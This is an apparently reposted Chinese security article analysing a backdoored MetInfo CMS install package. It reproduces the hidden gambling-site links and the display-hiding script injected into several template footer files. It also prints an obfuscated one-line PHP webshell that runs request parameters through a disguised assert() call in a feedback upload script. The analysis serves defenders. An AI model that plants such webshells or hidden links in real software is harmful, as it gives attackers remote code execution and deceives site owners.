欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

MetInfo(米拓)企业网站管理系被插后门

来源:本站转载 作者:佚名 时间:2013-12-22 TAG: 我要投稿

 关于“MetInfo(米拓)企业网站管理系统”

 
MetInfo企业网站管理系统采用PHP+Mysql架构,全站内置了SEO搜索引擎优化机制,支持用户自定义界面语言(全球各种语言),拥有企业网站常用的模块功能(企业简介模块、新闻模块、产品模块、下载模块、图片模块、招聘模块、在线留言、反馈系统、在线交流、友情链接、网站地图、会员与权限管理)。强大灵活的后台管理功能、静态页面生成功能、个性化模块添加功能、不同栏目自定义FLASH样式功能等可为企业打造出大气漂亮且具有营销力的精品网站。
 
官方网站:http://www.metinfo.cn/
 
后门文件分析
 
经过我们分析,在MetInfo安装文件包里的文件做了如下修改:
 
、在多个html文件里植入了“黑链”代码。
 
包括如下文件及对应恶意代码:
 
/templates/metv4/foot.html 第7行被植入如下代码:
 
 
 
<div id="moreA"><a href="http://www.sjc9.com" target="_blank">皇冠网</a><a href="http://www.sjc5.com" target="_blank">百家乐</a><a href="http://www.cai688.com" target="_blank">博彩通</a></div><script>document.getElementById("m"+"o"+"r"+"e"+"A").style.display="none";</script>
/templates/metv2/foot.html 第0行被植入如下代码:
 
 
 
<div id="moreA"><a href="http://www.sjc9.com" target="_blank">皇冠网</a><a href="http://www.sjc5.com" target="_blank">百家乐</a><a href="http://www.cai688.com" target="_blank">博彩通</a></div><script>document.getElementById("m"+"o"+"r"+"e"+"A").style.display="none";</script>
/templates/metv5s/foot.html 第3行被植入如下代码:
 
 
 
<div id="moreA"><a href="http://www.sjc9.com" target="_blank">皇冠网</a><a href="http://www.sjc5.com" target="_blank">百家乐</a><a href="http://www.cai688.com" target="_blank">博彩通</a></div><script>document.getElementById("m"+"o"+"r"+"e"+"A").style.display="none";</script>
/templates/default/foot.html 第3行被植入如下代码:
 
 
 
<div id="moreA"><a href="http://www.sjc9.com" target="_blank">皇冠网</a><a href="http://www.sjc5.com" target="_blank">百家乐</a><a href="http://www.cai688.com" target="_blank">博彩通</a></div><script>document.getElementById("m"+"o"+"r"+"e"+"A").style.display="none";</script>
/tmp/templates/metv3/foot.html 第7行被植入如下代码:
 
 
 
<a href="http://www.sjc9.com" target="_blank">皇冠网</a><a href="http://www.sjc5.com" target="_blank">百家乐</a><a href="http://www.cai688.com" target="_blank">博彩通</a></div><script>document.getElementById("m"+"o"+"r"+"e"+"A").style.display="none";</script>
/tmp/templates/met007/foot.html 第9行被植入如下代码:
 
 
 
<a href="http://www.sjc9.com" target="_blank">皇冠网</a><a href="http://www.sjc5.com" target="_blank">百家乐</a><a href="http://www.cai688.com" target="_blank">博彩通</a></div><script>document.getElementById("m"+"o"+"r"+"e"+"A").style.display="none";</script>
2、网站木马后门代码植入。
 
位于/feedback/uploadfile_save.php 第7行被植入了如下后门代码:
 
 
 
if(isset($_REQUEST['[马赛克]'])){$a = str_replace(x,"","axsxxsxexrxxt");$a($_REQUEST["[马赛克]"]);}
 
【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载